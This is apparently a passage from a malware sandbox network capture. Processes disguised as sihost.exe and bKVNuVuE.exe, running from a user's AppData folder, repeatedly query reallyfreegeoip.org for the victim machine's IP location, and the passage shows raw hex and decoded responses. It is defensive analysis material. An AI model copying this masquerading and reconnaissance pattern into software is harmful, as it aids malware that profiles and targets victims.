                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET,PUT,POST
                                    Access-Control-Allow-Headers: Content-Type, Authorization
                                    Access-Control-Allow-Credentials: true
                                    Content-Length: 0
                                    Content-Type: text/html; charset=UTF-8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.2249167188.114.96.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:49 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:49 UTC716INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:49 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10592
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UohUvzJcduVjTtOAoRzm2XUs8sjFP%2BojKHiRhueirqBAhHd0xibse%2F%2FpHGFhrPlbp6vvUbafcXd%2FcvnKhM7HQVv17LlpIO6TDe8PVh%2Fq9OBPAs%2FWBe4ixu6ODle1cKbO7%2BR%2FO0bD"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abe85bdda5e6a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:49 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.2249168188.114.96.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:50 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    2024-08-13 18:24:50 UTC710INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:50 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10593
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S1a07BnRgLpSKe%2BneKz1mcDnWKNFTcFp%2BLtUO%2FCEsipAN6hE9bOMyanusu8tghSAhKKDzxJfveudfq3FOnZoFV%2Fg3sFFktey0%2F0i89lxWRVFkSBDjzqNcy9vTQtMtS9XBzCSOAyk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abe8bafd34396-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.2249170188.114.97.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:52 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:52 UTC708INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:52 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10595
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2B1zaoECMNeCrdCslG%2BMuXHBXgKQg15YUmOsYmLfS2zTvDS5ODO2iVgV7fetONOrP3xrRoNDrVtfHueOsgJlIihQznovV8QXzh21S0Xtivabq%2FGq5RAAWgl%2FGyyWeefw4W90Jegl"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abe996dd41a13-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:52 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.2249172188.114.97.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:54 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:54 UTC706INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:54 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10597
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hGv%2Bl5GPmGvQJZJI935cxU6ZNehh9cAmImIDss9YJhDW19wc6mKQih1G9fVgFXcA0wx2EAtrMIK1s%2FIaxpQNQ3ny8%2BjgWTPWuZqjHA53vTcpBb8ivtO7czojl20kqrxPCsdkfpXO"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abea24ba141c1-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:54 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.2249174188.114.97.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:55 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:55 UTC702INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:55 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10598
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3TRcJYF2moFr4exzck0Qrxcde6ucuMmEmQYfx70h88JUDd89TsM3l4ocxKL%2F55asbadihZmGUrs263uO7bDhmBGrMywSidwZe8wT9owZzfeDMOjSQ0lAuogl22QAwlcncZijFmb"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abeac98120f7f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:55 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.2249176188.114.96.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:57 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:57 UTC706INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:57 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10600
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i80mrYApi%2BDPvJtlOGdC63qNBsjVR4T8dpq7ai9KmHo7tErgwDKig%2FJN%2BcAOYzZJdMo7lv2FARqdpOiS5ItAxQd4VsrC6LS7BG5uomuzr6dyKmh49pf9wRxZKBy8yqcRS07bcG16"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abeb93bb54255-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:57 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.2249179188.114.97.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:59 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:59 UTC708INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:59 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10602
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNhOTFuvhPzFe7x%2Bl3r19CknrqADDfvfEN8cqyPMjqaNQ6eG%2BV%2FzdTWT%2FZZbMNV6MFVcwNMWVTjIMEZiy6zPlMUDC0dffNfFynrDZCGWtu6oIsnzYK5z0tp2cAm7kZkgwRhykPjG"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abec65a861839-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:24:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:24:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.2249180188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:00 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:00 UTC710INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:00 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10603
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvF7HFXtnbhe6kj%2B43LXjuztpYzhy3v1F%2Ff676RJcJ7MCZ5lA6p8%2B99I6SCVVf%2Fb8MBoXmpjELG4x4o%2BOvVuaIUBDtMm7pMbSFXrP0hOMSf2Or3205JL6irRn1npBwKcXG0LmJNq"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abec8fc8e17b5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:00 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.2249182188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:01 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    2024-08-13 18:25:01 UTC706INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:01 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10604
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BBWS4PfZ8xlHByKvjoVN1z86HH%2BLnDmvNjBe39bBx1mUC26thgAZI48IhMfkDItgLzmOn61BBkwtVXupQeIDchhpEdWBOBzl%2Br%2BJZ43aHuSLzxaOySGg8Bx1Gi7DYDUikn7keUTm"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abed31a347295-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.2249184188.114.97.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    2024-08-13 18:25:04 UTC712INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:04 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10607
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kz3nlrtNGneosxUeojg66BQPbgB%2FZSZB79Q70c9t%2FeM0%2Bq%2BmvD5OLlhr7rmNMLnwZHAkDokdSgUo1lt2qph8yyKbw5NuN8fuxT4G1SRwIm8qIm8j%2FHVM8jS%2BTU1sHOoX710IYuO7"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abee1ac3b8cad-EWR
                                    alt-svc: h3=":443"; ma=86400
